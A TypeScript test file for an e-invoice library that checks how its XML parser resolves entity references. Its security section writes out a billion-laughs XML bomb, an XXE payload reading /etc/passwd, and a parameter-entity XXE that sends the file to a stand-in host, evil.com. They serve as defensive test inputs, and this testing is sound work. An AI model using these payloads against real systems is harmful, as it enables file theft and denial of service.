einvoice/test/suite/einvoice_parsing/test.parse-09.entity-references.ts
2025-05-25 19:45:37 +00:00

486 lines
16 KiB
TypeScript
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

import { expect, tap } from '@git.zone/tstest/tapbundle';
import * as einvoice from '../../../ts/index.js';
import * as plugins from '../../plugins.js';
import { CorpusLoader } from '../../helpers/corpus.loader.js';
import { PerformanceTracker } from '../../helpers/performance.tracker.js';
tap.test('PARSE-09: Entity Reference Resolution - Handle XML entities correctly', async (t) => {
const performanceTracker = new PerformanceTracker('PARSE-09');
await t.test('Predefined XML entities', async () => {
performanceTracker.startOperation('predefined-entities');
const predefinedEntities = [
{
name: 'Ampersand',
entity: '&',
character: '&',
description: 'Used in company names and text'
},
{
name: 'Less than',
entity: '<',
character: '<',
description: 'Used in text content'
},
{
name: 'Greater than',
entity: '&gt;',
character: '>',
description: 'Used in text content'
},
{
name: 'Quote',
entity: '&quot;',
character: '"',
description: 'Used in attribute values'
},
{
name: 'Apostrophe',
entity: '&apos;',
character: "'",
description: 'Used in attribute values'
}
];
for (const entity of predefinedEntities) {
const startTime = performance.now();
const testXml = `<?xml version="1.0"?>
<invoice>
<supplier>Test ${entity.entity} Company</supplier>
<note attribute="${entity.entity}value">Text with ${entity.entity} entity</note>
</invoice>`;
console.log(`${entity.name} entity (${entity.entity}):`);
console.log(` Character: "${entity.character}"`);
console.log(` Usage: ${entity.description}`);
try {
const invoice = new einvoice.EInvoice();
if (invoice.fromXmlString) {
await invoice.fromXmlString(testXml);
console.log(' ✓ Entity resolved correctly');
} else {
console.log(' ⚠️ Cannot test without fromXmlString');
}
} catch (error) {
console.log(` ✗ Error: ${error.message}`);
}
performanceTracker.recordMetric('predefined-entity', performance.now() - startTime);
}
performanceTracker.endOperation('predefined-entities');
});
await t.test('Numeric character references', async () => {
performanceTracker.startOperation('numeric-entities');
const numericTests = [
{
name: 'Decimal references',
tests: [
{ ref: '&#65;', char: 'A', description: 'Latin capital A' },
{ ref: '&#8364;', char: '€', description: 'Euro sign' },
{ ref: '&#169;', char: '©', description: 'Copyright symbol' },
{ ref: '&#8482;', char: '™', description: 'Trademark symbol' },
{ ref: '&#176;', char: '°', description: 'Degree symbol' }
]
},
{
name: 'Hexadecimal references',
tests: [
{ ref: '&#x41;', char: 'A', description: 'Latin capital A (hex)' },
{ ref: '&#x20AC;', char: '€', description: 'Euro sign (hex)' },
{ ref: '&#xA9;', char: '©', description: 'Copyright (hex)' },
{ ref: '&#x2122;', char: '™', description: 'Trademark (hex)' },
{ ref: '&#xB0;', char: '°', description: 'Degree (hex)' }
]
}
];
for (const category of numericTests) {
console.log(`\n${category.name}:`);
for (const test of category.tests) {
const startTime = performance.now();
const xml = `<?xml version="1.0"?>
<invoice>
<amount currency="${test.ref}EUR">100.00</amount>
<temperature>${test.ref}C</temperature>
<copyright>${test.ref} 2024</copyright>
</invoice>`;
console.log(` ${test.ref} = "${test.char}" (${test.description})`);
try {
// Verify entity resolution
const resolved = xml.replace(new RegExp(test.ref, 'g'), test.char);
if (resolved.includes(test.char)) {
console.log(' ✓ Entity would resolve correctly');
}
} catch (error) {
console.log(` ✗ Resolution error: ${error.message}`);
}
performanceTracker.recordMetric('numeric-ref', performance.now() - startTime);
}
}
performanceTracker.endOperation('numeric-entities');
});
await t.test('Custom entity definitions (DTD)', async () => {
performanceTracker.startOperation('custom-entities');
const customEntityTests = [
{
name: 'Internal DTD entities',
xml: `<?xml version="1.0"?>
<!DOCTYPE invoice [
<!ENTITY company "Acme Corporation">
<!ENTITY address "123 Main Street, London">
<!ENTITY year "2024">
<!ENTITY currency "EUR">
]>
<invoice>
<supplier>&company;</supplier>
<supplierAddress>&address;</supplierAddress>
<date>01-01-&year;</date>
<amount currency="&currency;">1000.00</amount>
</invoice>`,
entities: {
'company': 'Acme Corporation',
'address': '123 Main Street, London',
'year': '2024',
'currency': 'EUR'
}
},
{
name: 'Parameter entities',
xml: `<?xml version="1.0"?>
<!DOCTYPE invoice [
<!ENTITY % common SYSTEM "common.dtd">
%common;
<!ENTITY company "Test Company">
]>
<invoice>
<supplier>&company;</supplier>
</invoice>`,
description: 'External parameter entities (security risk)'
},
{
name: 'Nested entity references',
xml: `<?xml version="1.0"?>
<!DOCTYPE invoice [
<!ENTITY city "London">
<!ENTITY country "UK">
<!ENTITY fullAddress "&city;, &country;">
]>
<invoice>
<address>&fullAddress;</address>
</invoice>`,
expected: 'London, UK'
}
];
for (const test of customEntityTests) {
const startTime = performance.now();
console.log(`\n${test.name}:`);
if (test.entities) {
console.log(' Defined entities:');
for (const [name, value] of Object.entries(test.entities)) {
console.log(` &${name}; = "${value}"`);
}
}
if (test.description) {
console.log(` Note: ${test.description}`);
}
if (test.expected) {
console.log(` Expected result: ${test.expected}`);
}
try {
const invoice = new einvoice.EInvoice();
if (invoice.fromXmlString) {
// Note: Many parsers disable DTD processing by default for security
await invoice.fromXmlString(test.xml);
console.log(' ✓ Parsed (DTD support may vary)');
}
} catch (error) {
console.log(` ⚠️ DTD parsing: ${error.message}`);
console.log(' Note: DTD processing often disabled for security');
}
performanceTracker.recordMetric('custom-entity', performance.now() - startTime);
}
performanceTracker.endOperation('custom-entities');
});
await t.test('Entity security considerations', async () => {
performanceTracker.startOperation('entity-security');
const securityTests = [
{
name: 'Billion laughs attack (XML bomb)',
xml: `<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
]>
<invoice>
<data>&lol4;</data>
</invoice>`,
risk: 'Exponential entity expansion',
mitigation: 'Disable DTD processing or limit entity expansion'
},
{
name: 'External entity injection (XXE)',
xml: `<?xml version="1.0"?>
<!DOCTYPE invoice [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<invoice>
<data>&xxe;</data>
</invoice>`,
risk: 'File disclosure, SSRF',
mitigation: 'Disable external entity resolution'
},
{
name: 'Parameter entity XXE',
xml: `<?xml version="1.0"?>
<!DOCTYPE invoice [
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://evil.com/?data=%file;'>">
%eval;
%exfil;
]>
<invoice></invoice>`,
risk: 'Out-of-band data exfiltration',
mitigation: 'Disable parameter entities'
}
];
for (const test of securityTests) {
console.log(`\n${test.name}:`);
console.log(` Risk: ${test.risk}`);
console.log(` Mitigation: ${test.mitigation}`);
const startTime = performance.now();
try {
const invoice = new einvoice.EInvoice();
if (invoice.fromXmlString) {
await invoice.fromXmlString(test.xml);
console.log(' ⚠️ SECURITY WARNING: Parser allowed dangerous entities!');
}
} catch (error) {
console.log(' ✓ Parser correctly rejected dangerous entities');
console.log(` Error: ${error.message}`);
}
performanceTracker.recordMetric('security-test', performance.now() - startTime);
}
performanceTracker.endOperation('entity-security');
});
await t.test('Entity usage in e-invoices', async () => {
performanceTracker.startOperation('einvoice-entities');
const einvoicePatterns = [
{
name: 'Currency symbols',
examples: [
{ text: 'Price in &#8364; (EUR)', entity: '&#8364;', resolved: '€' },
{ text: 'Amount in &#163; (GBP)', entity: '&#163;', resolved: '£' },
{ text: 'Cost in &#36; (USD)', entity: '&#36;', resolved: '$' },
{ text: 'Price in &#165; (JPY)', entity: '&#165;', resolved: '¥' }
]
},
{
name: 'Special characters in company names',
examples: [
{ text: 'Smith &amp; Jones Ltd.', entity: '&amp;', resolved: '&' },
{ text: 'AT&amp;T Communications', entity: '&amp;', resolved: '&' },
{ text: 'L&apos;Oréal Paris', entity: '&apos;', resolved: "'" },
{ text: '&quot;Best Price&quot; Store', entity: '&quot;', resolved: '"' }
]
},
{
name: 'Legal symbols',
examples: [
{ text: 'Copyright &#169; 2024', entity: '&#169;', resolved: '©' },
{ text: 'Registered &#174;', entity: '&#174;', resolved: '®' },
{ text: 'Trademark &#8482;', entity: '&#8482;', resolved: '™' }
]
},
{
name: 'Mathematical symbols',
examples: [
{ text: 'Temperature &#177;2&#176;C', entity: '&#177;/&#176;', resolved: '±/°' },
{ text: 'Discount &#8804; 50%', entity: '&#8804;', resolved: '≤' },
{ text: 'Quantity &#215; Price', entity: '&#215;', resolved: '×' }
]
}
];
for (const category of einvoicePatterns) {
console.log(`\n${category.name}:`);
for (const example of category.examples) {
console.log(` "${example.text}"`);
console.log(` Entity: ${example.entity}${example.resolved}`);
}
}
performanceTracker.endOperation('einvoice-entities');
});
await t.test('Corpus entity analysis', async () => {
performanceTracker.startOperation('corpus-entities');
const corpusLoader = new CorpusLoader();
const xmlFiles = await corpusLoader.getFiles(/\.(xml|ubl|cii)$/);
console.log(`\nAnalyzing entity usage in ${xmlFiles.length} corpus files...`);
const entityStats = {
total: 0,
filesWithEntities: 0,
predefinedEntities: new Map<string, number>(),
numericEntities: 0,
customEntities: 0,
dtdFiles: 0
};
const sampleSize = Math.min(100, xmlFiles.length);
const sampledFiles = xmlFiles.slice(0, sampleSize);
for (const file of sampledFiles) {
entityStats.total++;
try {
const content = await plugins.fs.readFile(file.path, 'utf8');
let hasEntities = false;
// Check for predefined entities
const predefined = ['&amp;', '&lt;', '&gt;', '&quot;', '&apos;'];
for (const entity of predefined) {
if (content.includes(entity)) {
hasEntities = true;
entityStats.predefinedEntities.set(
entity,
(entityStats.predefinedEntities.get(entity) || 0) + 1
);
}
}
// Check for numeric entities
if (/&#\d+;|&#x[\dA-Fa-f]+;/.test(content)) {
hasEntities = true;
entityStats.numericEntities++;
}
// Check for DTD
if (content.includes('<!DOCTYPE') || content.includes('<!ENTITY')) {
entityStats.dtdFiles++;
entityStats.customEntities++;
}
if (hasEntities) {
entityStats.filesWithEntities++;
}
} catch (error) {
// Skip files that can't be read
}
}
console.log('\nEntity Usage Statistics:');
console.log(`Files analyzed: ${entityStats.total}`);
console.log(`Files with entities: ${entityStats.filesWithEntities} (${(entityStats.filesWithEntities/entityStats.total*100).toFixed(1)}%)`);
console.log('\nPredefined entities:');
for (const [entity, count] of entityStats.predefinedEntities.entries()) {
console.log(` ${entity}: ${count} files`);
}
console.log(`\nNumeric entities: ${entityStats.numericEntities} files`);
console.log(`DTD declarations: ${entityStats.dtdFiles} files`);
console.log(`Custom entities: ${entityStats.customEntities} files`);
performanceTracker.endOperation('corpus-entities');
});
await t.test('Entity resolution performance', async () => {
performanceTracker.startOperation('entity-performance');
// Generate XML with varying entity density
const generateXmlWithEntities = (entityCount: number): string => {
let xml = '<?xml version="1.0"?>\n<invoice>\n';
for (let i = 0; i < entityCount; i++) {
xml += ` <field${i}>Text with &amp; entity &#8364; and &#169; symbols</field${i}>\n`;
}
xml += '</invoice>';
return xml;
};
const testSizes = [10, 100, 500, 1000];
console.log('\nEntity resolution performance:');
for (const size of testSizes) {
const xml = generateXmlWithEntities(size);
const xmlSize = Buffer.byteLength(xml, 'utf8');
const entityCount = size * 3; // 3 entities per field
const startTime = performance.now();
try {
const invoice = new einvoice.EInvoice();
if (invoice.fromXmlString) {
await invoice.fromXmlString(xml);
}
const parseTime = performance.now() - startTime;
console.log(` ${entityCount} entities (${(xmlSize/1024).toFixed(1)}KB):`);
console.log(` Parse time: ${parseTime.toFixed(2)}ms`);
console.log(` Entities/ms: ${(entityCount / parseTime).toFixed(1)}`);
performanceTracker.recordMetric(`entities-${size}`, parseTime);
} catch (error) {
console.log(` Error with ${size} entities: ${error.message}`);
}
}
performanceTracker.endOperation('entity-performance');
});
// Performance summary
console.log('\n' + performanceTracker.getSummary());
// Entity handling best practices
console.log('\nEntity Reference Resolution Best Practices:');
console.log('1. Always handle predefined XML entities (&amp; &lt; &gt; &quot; &apos;)');
console.log('2. Support numeric character references (decimal and hex)');
console.log('3. Be cautious with DTD processing (security risks)');
console.log('4. Disable external entity resolution by default');
console.log('5. Limit entity expansion depth to prevent attacks');
console.log('6. Validate resolved content after entity expansion');
console.log('7. Consider entity usage impact on performance');
console.log('8. Document security settings clearly for users');
});
tap.start();